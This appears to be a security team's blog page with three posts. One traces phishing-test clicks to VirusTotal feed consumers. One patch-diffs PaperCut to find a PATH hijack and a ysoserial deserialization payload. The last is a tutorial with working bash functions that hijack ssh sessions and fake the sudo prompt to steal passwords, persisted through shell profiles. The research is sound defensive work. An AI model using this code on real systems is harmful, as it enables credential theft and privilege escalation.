Who’s watching your VirusTotal submissions?

Phishing testing is often a part of a company’s security training, and conducting frequent phishing tests is part of our security program here at Code42. As part of those tests, we monitor both click rates and reporting rates, as we consistently message our employees to report any suspicious-looking emails to the security team. So when the most recent phishing test report from our vendor KnowBe4 included three clicks from IPs in China, it resulted in an investigation that ultimately uncovered some interesting consequences of using public security scanners.

All three users said that they hadn’t clicked on the link in the phishing test, and all three did report the email as expected. Although it’s possible for a user to click a link after submitting it as suspicious, it’s not a behavior pattern we typically see. Plus, due to the security culture at Code42, most users willingly own up to clicking on links in emails, so we had no reason to doubt that the users were telling the truth when they said they didn’t click on anything. That did present a puzzle, however: how could a personalized link from KnowBe4 that exists only in the phishing test email make its way to some IP address in China, and was that indicative of something malicious? Seeing no immediate answers, the SOC team started digging in.

When coming up with possible explanations for how this URL could end up outside of the user’s account, we brainstormed several threat vectors:

  • The obvious one is malware: in this case, malware on the endpoint that scrapes URLs from emails or otherwise provides remote access that could be leveraged to extract data from an email account. That’s not impossible, but an attacker using that kind of access to grab a URL from an email rather than, say, deploy ransomware seemed unlikely.
  • A fake OAuth application: these are apps that look legitimate and connect to your online accounts via OAuth, requesting permissions like reading your email in your Office365 or Google accounts. These are becoming more and more prevalent, so this was a serious option to consider.
  • Another possibility was a malicious browser extension that could grab data from a Google Mail page. This is also becoming an issue that security teams need to keep in mind as part of their threat model.
  • Finally, we considered that our own security tools or processes may have triggered some unintended side effects that led to this behavior.

It turned out that the last one was the culprit! But before moving on to the explanation, a few words about investigating the other options. An EDR tool would be most useful for investigating the malware scenario. Viewing connected apps in your cloud provider’s admin console is one way to hunt for suspicious OAuth apps, as is monitoring your log event stream and capturing new OAuth permission grants as they happen. As for browser extensions, a tool like osquery can be used to enumerate extensions and help identify any that look odd.
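
For example, a quick osquery run can enumerate installed Chrome extensions per user (a hedged sketch; the chrome_extensions table ships with osquery):

# Enumerate Chrome extensions per user; unfamiliar identifiers warrant a closer look
osqueryi "SELECT u.username, ce.name, ce.identifier, ce.version FROM users u JOIN chrome_extensions ce USING (uid);"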

But in this case, it was our own security tools that led to the odd clicks. At Code42, we use Palo Alto Cortex XSOAR as our SOAR platform, and one of our key automation playbooks handles emails that users send to our SOC team. We built an automated response into that playbook that thanks people who submit phishing tests and keeps track of who reported the email for those aforementioned metrics. However, sometimes the email is forwarded in such a way that the playbook logic can’t automatically determine that it is part of a phishing exercise. When that happens, it goes through the normal investigation workflow, including sending URLs to services like urlscan.io and VirusTotal. Ultimately, we determined that the latter service led to the recorded click event, but how did we get there?
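
Before getting into that, it’s worth illustrating the raw shape of a URL submission to VirusTotal’s v3 API (a hedged sketch; our playbook actually uses XSOAR’s built-in integrations rather than raw curl, and VT_API_KEY is assumed to hold a valid key):

# Submit a URL to VirusTotal for analysis (v3 API)
curl -s -X POST "https://www.virustotal.com/api/v3/urls" \
  -H "x-apikey: $VT_API_KEY" \
  --form "url=https://example.com/some-suspicious-link"

Once a URL is submitted this way, it becomes part of VirusTotal’s corpus, which is exactly where this story is headed.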

First, we started with a standard tactic: checking whether those suspicious IPs showed up anywhere else besides the URL click. When we looked for other traffic from those IPs in our logs, we did find a few events. The requests were to URLs on web servers that we control (and therefore log), and they were largely innocuous: HTTP requests to static pages, support articles, and so forth. Digging into one particularly personalized URL, though, we found that not only had the suspicious IP visited it, but so had a number of other IPs, including IPs from Google, DigitalOcean, and Palo Alto Networks. Taking a close look at the user agents for some of those events revealed that the sequence always appeared to start with a Google IP, one whose user agent string included “appid: s~virustotalcloud”. Once we saw this, things began to fall into place.
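
If you want to hunt for that scanner in your own logs, a hedged example (the log path and format are assumptions; adapt to your environment):

# Find VirusTotal’s fetches in a web server access log
grep -i 's~virustotalcloud' /var/log/nginx/access.log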

We discovered a pretty consistent pattern: the VirusTotal HTTP request came first, and then, over a period of 24–36 hours, other IPs would make HTTP requests to the same URL. Some of these URLs were very long and contained arbitrary data, so the only logical source could have been the original VirusTotal HTTP request. In other words, it looked like organizations were ingesting all VirusTotal URL submissions via the API and visiting those URLs themselves to (likely) do their own analysis.

For some of the source IPs, this explanation made a lot of sense: VirusTotal does have a robust API, including a feed of all submitted URLs. Other security vendors use this data as an input into their own tooling to add additional context. But some of the traffic indicated that unknown non-security actors were doing the same thing.
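
Pulling that feed programmatically is straightforward for licensed customers. A hedged sketch of what consuming it might look like (the endpoint path and per-minute batch format are assumptions based on VirusTotal’s feeds documentation, so verify against the current docs):

# Fetch one per-minute batch of URL submissions from the v3 feeds API
curl -s -H "x-apikey: $VT_API_KEY" \
  "https://www.virustotal.com/api/v3/feeds/urls/202101010000" \
  --output url-feed-batch.bz2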

At least, that was the hypothesis we had put together. The next step was to test it, so we generated a fake, easily trackable URL on a domain we controlled. We submitted it to VirusTotal and sat back to wait for the results. And sure enough, we saw the same pattern once again:

HTTP requests

The first HTTP requests came from VirusTotal. As before, Palo Alto, DigitalOcean, and AWS showed up. But so did curious networks like “Orange Polska Spolka Akcyjna” and “Vysokie tehnologii Limited Liability Company”. Finally, at the end, the network we saw in our phishing exercise, “Guangdong Mobile Communication Co.Ltd.”, appeared as if on schedule. That traffic consistently had a user agent string of “okhttp/3.12.13”, which also matched the “Generic Browser” entry that the phishing reporting dashboard recorded for the browser that registered the click.

In the end, we felt our hypothesis was confirmed and that the clicks were neither user-initiated nor malicious. We also followed up with KnowBe4 and learned that we can remove those non-user-initiated clicks to keep our reporting accurate. But it served as a great reminder that when you use a tool like VirusTotal as part of your investigation, you don’t control who sees what you submit, and they may decide to take their own look at what you are sharing. More importantly, when you see strange activity in a phishing exercise, remember to “assume breach” but realize there are other explanations out there too!

Death By a Thousand Papercuts


Patch diffing major releases


From time to time our pentest team reviews software that we are either using or interested in acquiring. That was the case with Papercut, a multifunction printer/scanner management suite for enterprise printers. The idea behind Papercut is pretty neat: a user can submit a print job to a Papercut queue, then walk up to any nearby physical printer and release the job there. Users don’t have to select from dozens of printers and hope they picked the right one. It does a lot of other stuff too, but you get the point, it’s for printing 🙂


Typically when starting an application security assessment, I’ll begin by searching for previously disclosed vulnerabilities from other researchers. In the case of Papercut there was only one recent CVE I could find, and it came without much detail. CVE-2019-12135 stated: “An unspecified vulnerability in the application server in Papercut MF and NG versions 18.3.8 and earlier and versions 19.0.3 and earlier allows remote attackers to execute arbitrary code via an unspecified vector.”


I don’t like unspecified vulnerabilities! However, this was a good opportunity to do some patch diffing and general security research on the product. The purpose of this article is to walk through patch diffing across major releases to find an undisclosed or purposely opaque vulnerability.


Before diving into the patch diffing, we also wanted to get an idea of how the application generally behaves.


Typically I’ll look for services and processes related to the target, and check what those binaries try to load. Our first finding, which was relatively easy to uncover, was that the mobility-print.exe process attempts to load ps2pdf.exe, cmd, bat, and vbs files from the Windows PATH environment variable. As a developer, it’s important to realize that the PATH is something you have no control over and that can be modified, so loading arbitrary files from that untrusted path is not a good idea.

mobility-print.exe loading files from the PATH variable


After this finding we created a simple POC which spawned calc.exe from a directory on the PATH. In our case, a SQL Server installation that was part of our Papercut install allowed an unprivileged user to escalate privileges to SYSTEM, because F:\Program Files had the NTFS special permissions to write/append data.

POC bat file that spawns calc.exe
Calc.exe spawned as SYSTEM

First vulnerability down! That was easy, although it’s far from remote code execution. Still, from the perspective of insider risk, a malicious insider with user-level access to the print server could take it over with this vulnerability. We reported this vulnerability to Papercut, and the newest release has this issue patched.


If you’ve done patch diffing of DLLs or binaries before, you know the important thing is to get the most recent version before the patch and the version immediately after it. Typically a tool like BinDiff is used to compare the two. Unfortunately, Papercut doesn’t let us download a standalone patch for the undisclosed RCE vulnerability, so the best we can do is download the point release before the fix and the point release containing it. That means there will be a large number of updated files, and the relevant change will be difficult to find. I made an educated guess that the remote code execution vulnerability would be an insecure deserialization issue, simply because the installer included a lot of jar files. The image below shows a graphical diffing view of the Papercut folder structure. The important thing here is that purple represents files that have been added.


Here we see a lot of class files added that didn’t exist before, with a lot of extraneous data filtered out.
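
You can get a similar list from the command line by diffing the class listings of the two releases’ jars (a hedged sketch; the old/ and new/ directories holding each release’s jars are assumptions):

# List the classes shipped in each release's jars, then diff them
for jar in old/*.jar; do unzip -l "$jar"; done | grep '\.class' | awk '{print $NF}' | sort -u > old-classes.txt
for jar in new/*.jar; do unzip -l "$jar"; done | grep '\.class' | awk '{print $NF}' | sort -u > new-classes.txt
diff old-classes.txt new-classes.txt | grep '^>'   # classes added in the patched release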

After diffing the point releases and seeing that SecureSerializationFilter had been added to the codebase, the next step was to find where the new class is leveraged (hint: it’s during serialization and deserialization of print jobs). With this information we can craft an attack payload against unpatched versions in the form of a print job.
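
One rough way to find those references is to grep the shipped jars for the class name, since compiled class files embed the names of the classes they use in their constant pools (a hedged sketch; the lib/ path is an assumption, adjust for your install):

# Report any jar whose classes reference the new filter
for jar in server/lib/*.jar; do
  unzip -p "$jar" | grep -qa 'SecureSerializationFilter' && echo "$jar"
done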


Finally, looking at the classpath of the server, we can see that Apache Commons Collections is included, so a ysoserial payload should work for achieving RCE. We’ve achieved the goal of understanding the root cause of the vulnerability even though the vendor didn’t provide any useful information about the issue. In a perfect world, the vendor would have shared this information in the first place!
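
Generating such a payload is a one-liner (a hedged example; the exact gadget chain, CommonsCollections5 here, depends on the Commons Collections version on the classpath, and the command it runs is attacker-chosen):

# Build a Commons Collections gadget chain that runs calc.exe when deserialized
java -jar ysoserial-all.jar CommonsCollections5 'calc.exe' > payload.bin

The resulting bytes would then be delivered wherever the unpatched server deserializes print job data.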


As a side note, Papercut is one of many vendors that leverage third-party libraries. MFP software represents an interesting target in that there are typically large numbers of file format parsers involved in translating image and office document formats into something the printer understands. Third-party libraries are often leveraged for this, and some may not be as well vetted or secure as, say, a Microsoft-developed library.

Privilege Escalation leveraging shell profiles

The title may not sound like it, but I promise, I’m not on the Red Team. However, as a systems administrator I do think that poking around at the tools available on the systems you manage is a good way to learn what precautions need to be taken when standing up new services and defining new security policies. Tom Bolen, one of our Red Team staff, wrote about leveraging command aliases set in users’ shell profiles to set up ssh connections in master mode. This allows an attacker to start a separate ssh session using a previously authenticated connection. It’s a fantastic post; give it a read if you haven’t already.

Looking at how his attack was carried out, I thought that the number of users leveraging aliases for ssh connections would limit how viable that attack would be. It would be better (or uh… worse?) if we could intercept all ssh commands and rewrite them as a master ssh connection. I asked Tom if it would be possible to modify the commands given by the user before they were sent to the shell. Like an alias, but for all ssh commands given by the end user. He answered, “Yep! the configuration file executes as a shell script so anything that you could run in a shell script you can run in there.”

The fact that these shell configuration files run as scripts, rather than just setting a few variables, makes their behavior significantly easier to manipulate: it gives me the ability to have functions handle the input and output.

Automating attacks from the shell profile

While it’s not too complicated to write a function that rewrites the command sent to the shell, the hard part is getting a user to run it. It turns out that functions defined in the shell configuration files are resolved before the actual binaries in the filesystem (/bin, /sbin, /usr/bin, /usr/sbin). All we need to do is name the function the same as the binary that the user wants to call, and it will be executed in place of the binary the user intended to run.

ssh () {
    # Capture the arguments the user passed to ssh
    args=$@
    arr=($args)
    arr_len=${#arr[@]}
    # Assume the last argument is the user@host target
    un_sys=${arr[arr_len-1]}
    # Name the control socket after the target connection
    socket="/tmp/$RANDOM-$un_sys"
    # Run the real ssh in master mode (-M) with a control socket (-S),
    # leaving the socket behind for the attacker to reuse
    bash -c "/usr/bin/ssh -M -S $socket $args"
}

This is a simple ssh function that records the connection arguments the user provided, generates a name for a temporary socket based on the connection being made, and passes a new command to the actual ssh binary to be executed. The user gets their ssh session; the attacker gets an authenticated socket they can use to ssh to the server separately.
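
From the attacker’s side, reusing the leftover socket is a single command (a hedged example; the socket name follows the /tmp/$RANDOM-user@host pattern generated above):

# Piggyback on the victim's authenticated master connection
/usr/bin/ssh -S /tmp/12345-admin@server01 admin@server01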

Now that we have a function, where do we attack from? If you only have access to a user session, add your function to ~/.bashrc (or the equivalent for alternative shells, e.g. ~/.zshrc), as shown below. If you have root access, adding the function to /etc/bash.bashrc loads it into the interactive sessions of all users. One thing to keep in mind is that these examples are written for bash; the syntax will likely differ from shell to shell.
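
Installing the function is as simple as appending it to the right file (a hedged example; ssh_hijack.sh is a hypothetical file containing the function above):

# User-level persistence
cat ssh_hijack.sh >> ~/.bashrc
# System-wide persistence (requires root)
cat ssh_hijack.sh | sudo tee -a /etc/bash.bashrc > /dev/null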

When I brought my findings back to Tom, he suggested another attack where this method might be useful: stealing user passwords entered via sudo. A basic version isn’t too difficult.

sudo () {
    # Capture the user's arguments
    args=$@
    # Naive prompt: the typed password is echoed to the terminal in the clear
    read -p "[sudo] password for $USER: " pw
    # Feed the captured password to the real sudo on stdin (-S)
    echo $pw | /usr/bin/sudo -S $args
}

The problem is that this does not act the same way as the actual authentication prompt. I would hope that even the newest Linux users would question why their password is being shown in the clear when authenticating. To pull this off effectively, we’ll need to mimic the behavior that sudo presents to the user.

Let’s set the criteria:

  1. The user can’t see their password being typed in.
  2. The malicious code should not prompt when sudo has already been authenticated and is still within the timeout window.
  3. The user can’t be shown any prompts that differ in formatting from the actual sudo command output.
sudo () {
    # Capture args as formatted
    args=$@
    # Check if the shell is already authenticated to sudo
    /usr/bin/sudo -n true &>/dev/null
    if [ $? -eq 1 ]; then
        # Capture the password with terminal echo disabled
        stty -echo
        read -p "[☠ sudo] password for $USER: " pw
        stty echo
        echo ""
        # Authenticate to sudo silently
        echo $pw | /usr/bin/sudo -S true &>/dev/null
        # Pass the original command to the real sudo
        /usr/bin/sudo $args
    else
        /usr/bin/sudo $args
    fi
}

The first issue was pretty easy to solve. Issuing the command stty -echo turns off echoing the user input to the terminal, hiding the password.

The second issue was a bit tougher, but was solved by issuing a command to sudo with the -n flag set, which disables the password prompt. That command fails or succeeds based on whether sudo has already been authenticated and is still within the timeout window. The exit status of 0 or 1 then determines whether or not to give the user the password prompt.

I ran into issues in some VMs where taking the password from stdin (standard input) still showed the password prompt. To get around this, I added echo $pw | /usr/bin/sudo -S true &>/dev/null to authenticate to sudo with the user password while redirecting all output to null. This allowed me to authenticate to sudo and then pass the actual arguments from the user to /usr/bin/sudo without needing to authenticate again.

Testing this against a lab VM resulted in sudo commands executing successfully while storing the password in a variable to be used or exported as needed by an attacker.


Using both of the functions documented here lays out a pretty simple attack path from persistence in a user session to root access on critical server infrastructure. While the flexibility of these configuration files makes working with servers via the command line easier, it also opens us up to attackers inserting malicious code to pivot around the network, stealing administrator credentials.

Not to leave the Blue Team empty-handed: keep an eye out for my next post, where we’ll look into mitigating these types of attacks in your environment.